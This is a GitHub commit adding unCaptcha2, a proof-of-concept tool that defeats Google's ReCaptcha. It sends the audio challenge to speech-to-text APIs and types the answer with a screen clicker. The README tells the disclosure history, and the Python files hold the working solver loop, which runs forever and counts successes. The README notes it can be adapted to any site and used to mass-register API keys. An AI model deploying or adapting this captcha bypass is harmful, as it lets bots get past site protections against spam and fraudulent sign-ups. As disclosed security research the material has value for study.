Added all files

ecthros committed Dec 31, 2018
1 parent dc77c70 commit 4121e0ecdc2243f7347a5fb2f3b2dde899f728b3
Showing with 287 additions and 1 deletion.
  1. +60 −1
  2. +3 −0 dependencies.txt
  3. +61 −0
  4. +163 −0
@@ -1 +1,60 @@
# uncaptcha2
<p align="center"> :warning: This code works against the most recent version of Google's ReCaptcha. Please do not attack any non-personal websites. :warning:</p>

Created in April 2017, unCaptcha achieved 85% accuracy defeating Google's ReCaptcha. After the release of this work, Google released an update to ReCaptcha with the following major changes:
* Better browser automation detection
* Spoken phrases rather than digits

These changes were initially successful in protecting against the original unCaptcha attack. However, as of June 2018, these challenges have been solved. We have been in contact with the ReCaptcha team for over six months and they are fully aware of this attack. The team has allowed us to release the code, despite its current success.

# Introducing unCaptcha2

Thanks to the changes to the audio challenge, passing ReCaptcha is easier than ever before. The code now only needs to make a single request to a free, publicly available speech-to-text API to achieve around *90% accuracy* over all captchas.

Since the updated ReCaptcha detects Selenium, a browser automation engine, unCaptcha2 instead uses a screen clicker that moves to specific pixels on the screen and navigates the page like a human. There is certainly work to be done here - the coordinates need to be updated for each new user, and the approach is not the most robust.

# The Approach

unCaptcha2's approach is very simple:
1. Navigate to Google's ReCaptcha Demo site
2. Navigate to audio challenge for ReCaptcha
3. Download audio challenge
4. Submit audio challenge to Speech To Text
5. Parse response and type answer
6. Press submit and check if successful
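
The six steps above can be sketched as a small driver function. This is only an illustration under stated assumptions: `solve_captcha` and its four callable parameters are hypothetical names, not part of this repository, and the `"None"` check mirrors the string the query functions in this commit return on failure.

```python
def solve_captcha(download_audio, transcribe, type_answer, check_success):
    """Run one solve attempt; every argument is a caller-supplied callable (hypothetical)."""
    audio_path = download_audio()              # steps 1-3: navigate and download
    if audio_path is None:
        return "download_failed"
    transcript = transcribe(audio_path)        # step 4: speech-to-text request
    if not transcript or transcript == "None":
        return "no_transcript"
    type_answer(transcript.strip())            # step 5: type the parsed answer
    return "solved" if check_success() else "failed"  # step 6: submit and check


# Example with stand-in callables instead of a real browser or API.
typed = []
outcome = solve_captcha(
    download_audio=lambda: "audio.mp3",
    transcribe=lambda path: " some spoken phrase ",
    type_answer=typed.append,
    check_success=lambda: True,
)
print(outcome, typed)
```

Passing the steps in as callables keeps the control flow testable without a screen, a browser, or network access.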

# Demo


# How To Use

Since unCaptcha2 has to go to specific coordinates on the screen, you'll need to update the coordinates based on your setup. These coordinates are located at the top of the main script. On Linux, the command `xdotool getmouselocation --shell` may be helpful for finding the coordinates of your mouse.
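
As a rough aid for collecting coordinates, the `KEY=VALUE` lines printed by `xdotool getmouselocation --shell` can be turned into an `(x, y)` tuple. The helper names below are hypothetical and not part of this repository; `current_mouse_location` assumes `xdotool` is installed and an X session is running.

```python
import subprocess


def parse_mouse_location(shell_output):
    """Parse the KEY=VALUE lines printed by `xdotool getmouselocation --shell`."""
    values = {}
    for line in shell_output.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            values[key.strip()] = value.strip()
    return int(values["X"]), int(values["Y"])


def current_mouse_location():
    """Ask xdotool where the mouse is right now (requires xdotool and X11)."""
    out = subprocess.check_output(
        ["xdotool", "getmouselocation", "--shell"], universal_newlines=True
    )
    return parse_mouse_location(out)


# Parsing a captured sample, so this part runs without xdotool.
sample = "X=154\nY=531\nSCREEN=0\nWINDOW=62914561\n"
print(parse_mouse_location(sample))  # (154, 531)
```

Hovering over each button in turn and calling `current_mouse_location()` gives a tuple that can be pasted into the matching `*_COORDS` constant.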

You'll also need to set your credentials for whichever speech-to-text API you choose. Since Google's, Microsoft's, and IBM's speech-to-text systems seem to work the best, those are already included in the `queryAPI` module. You'll have to set the username and password as required; for Google's API, you'll have to set an environment variable (`GOOGLE_APPLICATION_CREDENTIALS`) to the path of a file containing your Google application credentials.
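
A quick check before running can catch a missing or mistyped credentials path. This is a minimal sketch, assuming the variable should hold a path to an existing file; `google_credentials_path` is a hypothetical helper, not part of this repository.

```python
import os


def google_credentials_path(environ=None):
    """Return the credentials path from the environment, or raise if it is unusable."""
    environ = os.environ if environ is None else environ
    path = environ.get("GOOGLE_APPLICATION_CREDENTIALS")
    if not path:
        raise RuntimeError("GOOGLE_APPLICATION_CREDENTIALS is not set")
    if not os.path.isfile(path):
        raise RuntimeError("GOOGLE_APPLICATION_CREDENTIALS is not a file: " + path)
    return path


# Report the state of the current environment without crashing.
try:
    print("Using credentials at", google_credentials_path())
except RuntimeError as err:
    print("Credential check failed:", err)
```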

Finally, install the dependencies, using `pip install -r dependencies.txt`.

# Responsible Disclosure

We contacted the ReCaptcha team in June 2018 to alert them that the updates to the ReCaptcha system made it less secure, and a formal issue was opened on June 27th, 2018. We demonstrated a fully functional version of this attack soon thereafter. We chose to wait 6 months after the initial disclosure to give the ReCaptcha team time to address the underlying architectural issues in the ReCaptcha system. The ReCaptcha team is aware of this attack vector, and has confirmed they are okay with us releasing this code, despite its current success rate.

This attack vector was deemed out of scope for the bug bounty program.

# Disclaimer

unCaptcha2, like the original version, is meant to be a proof of concept. As Google updates its service, this repository will *not* be updated. As a result, it is not expected to work in the future, and is likely to break at any time.

Unfortunately, due to Google's work in browser automation detection, this version of unCaptcha does not use Selenium. As a result, the code has to navigate to specific parts of the screen. To see unCaptcha working for yourself, you will need to change the coordinates for your screen resolution.

While unCaptcha2 is tuned for Google's Demo site, it can be changed to work for any such site - the logic for defeating ReCaptcha will be the same.

Additionally, we have removed our API keys from all the necessary queries. If you are looking to recreate some of the work or are doing your own research in this area, you will need to acquire API keys from each of the six services used. These keys are delineated in our files by a long string of the character 'X'. It's worth noting that the only protection against creating multiple API keys is ReCaptcha - therefore, unCaptcha could be made self-sufficient by solving captchas to sign up for new API keys.
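
Because the removed keys are all runs of the character 'X', a small guard can flag any key that has not been replaced yet. This is an illustrative sketch; `is_placeholder_key` is a hypothetical helper, and treating lowercase 'x' as a placeholder too is an assumption based on the strings in this commit.

```python
def is_placeholder_key(value):
    """Return True if value is empty or made up only of the character 'X' (either case)."""
    return len(value) == 0 or set(value.upper()) == {"X"}


# Example: one unreplaced placeholder and one made-up key for illustration.
for name, key in [("BING_KEY", "xxxxxxxxxxxxxxxx"), ("EXAMPLE_KEY", "A1B2C3D4")]:
    status = "still a placeholder" if is_placeholder_key(key) else "looks set"
    print(name, status)
```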

As always, thanks to everyone who puts up with me, including,


Dave Levin


@@ -0,0 +1,3 @@
@@ -0,0 +1,61 @@
import speech_recognition as sr

# Shared recognizer used by every query function below
r = sr.Recognizer()

#################### SPEECH-TO-TEXT WEB APIS ####################
###### The following functions interact with the APIs we used to query for each segment ########
###### Keys have been removed from this section #######

# Query Wit.ai
def wit(audio):
    # recognize speech using Wit.ai
    WIT_AI_KEY = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXx" # Wit.ai keys are 32-character uppercase alphanumeric strings
    try:
        #print("Wit.ai: ")
        return r.recognize_wit(audio, key=WIT_AI_KEY)
    except sr.UnknownValueError:
        print("Wit.ai could not understand audio")
        return "None"
    except sr.RequestError as e:
        print("Could not request results from Wit.ai service; {0}".format(e))
        return "None"

# Query Bing
def bing(audio):
    BING_KEY = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
    # recognize speech using Microsoft Bing Voice Recognition
    try:
        #print("Microsoft Bing Voice Recognition: ")
        return r.recognize_bing(audio, key=BING_KEY)
    except sr.UnknownValueError:
        print("Microsoft Bing Voice Recognition could not understand audio")
        return "None"
    except sr.RequestError as e:
        print("Could not request results from Microsoft Bing Voice Recognition service; {0}".format(e))
        return "None"

# Query IBM
def ibm(audio):
    # recognize speech using IBM Speech to Text
    IBM_USERNAME = "xxxxxxxxxxxxxxxxxxxxxxxxxx" # IBM Speech to Text usernames are strings of the form XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
    IBM_PASSWORD = "xxxxxxxxxxxxxxxxx" # IBM Speech to Text passwords are mixed-case alphanumeric strings
    try:
        #print("IBM Speech to Text: ")
        return r.recognize_ibm(audio, username=IBM_USERNAME, password=IBM_PASSWORD, show_all=False)
    except sr.UnknownValueError:
        print("IBM Speech to Text could not understand audio")
        return "None"
    except sr.RequestError as e:
        print("Could not request results from IBM Speech to Text service; {0}".format(e))
        return "None"

# Query Google Speech-To-Text
def google(audio):
    try:
        #print("Google: ")
        return r.recognize_google(audio)
    except (sr.UnknownValueError, sr.RequestError):
        print("Google could not understand")
        return "None"
@@ -0,0 +1,163 @@
import time
import pyautogui
import speech_recognition as sr
import os
import subprocess
from queryAPI import bing, google, ibm

''' You'll need to update based on the coordinates of your setup '''
FIREFOX_ICON_COORDS = (25, 67) # Location of the Firefox icon on the side toolbar (to left click)
PRIVATE_COORDS = (178, 69) # Location of "Open a new Private Window"
PRIVATE_BROWSER = (800, 443) # A place where the background of the Private Window will be
PRIVATE_COLOR = '#25003E' # The color of the background of the Private Window
SEARCH_COORDS = (417, 142) # Location of the Firefox Search box
REFRESH_COORDS = (181, 137) # Refresh button
GOOGLE_LOCATION = (117, 104) # Location of the Google Icon after navigating to
GOOGLE_COLOR = '#C3D8FC' # Color of the Google Icon
CAPTCHA_COORDS = (154, 531) # Coordinates of the empty CAPTCHA checkbox
CHECK_COORDS = (158, 542) # Location where the green checkmark will be
CHECK_COLOR = '#35B178' # Color of the green checkmark
AUDIO_COORDS = (258, 797) # Location of the Audio button
DOWNLOAD_COORDS = (318, 590) # Location of the Download button
FINAL_COORDS = (315, 534) # Text entry box
VERIFY_COORDS = (406, 647) # Verify button
CLOSE_LOCATION = (1095, 75)

DOWNLOAD_LOCATION = "../Downloads/"
''' END SETUP '''

r = sr.Recognizer()

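def runCommand(command):
    ''' Run a shell command and return the first whitespace-separated token of its output '''
    # universal_newlines=True makes the output text, so it can be compared with the color strings above
    proc = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True, universal_newlines=True)
    return proc.communicate()[0].split()[0]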

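def waitFor(coords, color):
    ''' Wait for a coordinate to become a certain color '''
    # The shell command below reads the pixel under the mouse, so move the mouse to coords first
    pyautogui.moveTo(coords)
    numWaitedFor = 0
    while color != runCommand("eval $(xdotool getmouselocation --shell); xwd -root -silent | convert xwd:- -depth 8 -crop \"1x1+$X+$Y\" txt:- | grep -om1 '#\\w\\+'"):
        time.sleep(.1) # Brief pause between polls
        numWaitedFor += 1
        if numWaitedFor > 25:
            return -1 # Gave up waiting
    return 0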

def downloadCaptcha():
    ''' Navigate to demo site, input user info, and download a captcha. '''
    print("Opening Firefox")
    if waitFor(PRIVATE_BROWSER, PRIVATE_COLOR) == -1: # Wait for browser to load
        return -1

    print("Visiting Demo Site")
    # Check if the page is loaded...
    if waitFor(GOOGLE_LOCATION, GOOGLE_COLOR) == -1: # Waiting for site to load
        return -1

    print("Downloading Captcha")
    # The pixel check reads the color under the mouse, so move to where the checkmark appears
    pyautogui.moveTo(CHECK_COORDS)
    if CHECK_COLOR in runCommand("eval $(xdotool getmouselocation --shell); xwd -root -silent | convert xwd:- -depth 8 -crop \"1x1+$X+$Y\" txt:- | grep -om1 '#\\w\\+'"):
        print("Already completed captcha.")
        return 2
    return 0

def checkCaptcha():
    ''' Check if we've completed the captcha successfully. '''
    # The pixel check reads the color under the mouse, so move to where the checkmark appears
    pyautogui.moveTo(CHECK_COORDS)
    if CHECK_COLOR in runCommand("eval $(xdotool getmouselocation --shell); xwd -root -silent | convert xwd:- -depth 8 -crop \"1x1+$X+$Y\" txt:- | grep -om1 '#\\w\\+'"):
        print("Successfully completed captcha.")
        output = 1
    else:
        print("An error occurred.")
        output = 0
    return output

def runCap():
    ''' Run one attempt. Returns 1 on success, 0 on failure, 2 if already allowed, 3 on error. '''
    try:
        print("Removing old files...")
        os.system('rm ./audio.wav 2>/dev/null') # These files may be left over from previous runs, and should be removed just in case.
        os.system('rm ' + DOWNLOAD_LOCATION + 'audio.mp3 2>/dev/null')
        # First, download the file
        downloadResult = downloadCaptcha()
        if downloadResult == 2:
            return 2
        elif downloadResult == -1:
            return 3

        # Convert the file to a format our APIs will understand
        print("Converting Captcha...")
        os.system("echo 'y' | ffmpeg -i " + DOWNLOAD_LOCATION + "audio.mp3 ./audio.wav 2>/dev/null")
        with sr.AudioFile('./audio.wav') as source:
            audio = r.record(source)

        print("Submitting To Speech to Text:")
        determined = google(audio) # Instead of google, you can use ibm or bing here

        print("Inputting Answer")
        # Input the captcha
        pyautogui.typewrite(determined, interval=.05)

        print("Verifying Answer")
        # Check that the captcha is completed
        result = checkCaptcha()
        return result
    except Exception:
        # Any unexpected error counts as a failed attempt
        return 3

if __name__ == '__main__':
    success = 0
    fail = 0
    allowed = 0

    # Run this forever and print statistics
    while True:
        res = runCap()
        if res == 1:
            success += 1
        elif res == 2: # Sometimes google just lets us in
            allowed += 1
        else:
            fail += 1

        print("SUCCESSES: " + str(success) + " FAILURES: " + str(fail) + " Allowed: " + str(allowed))
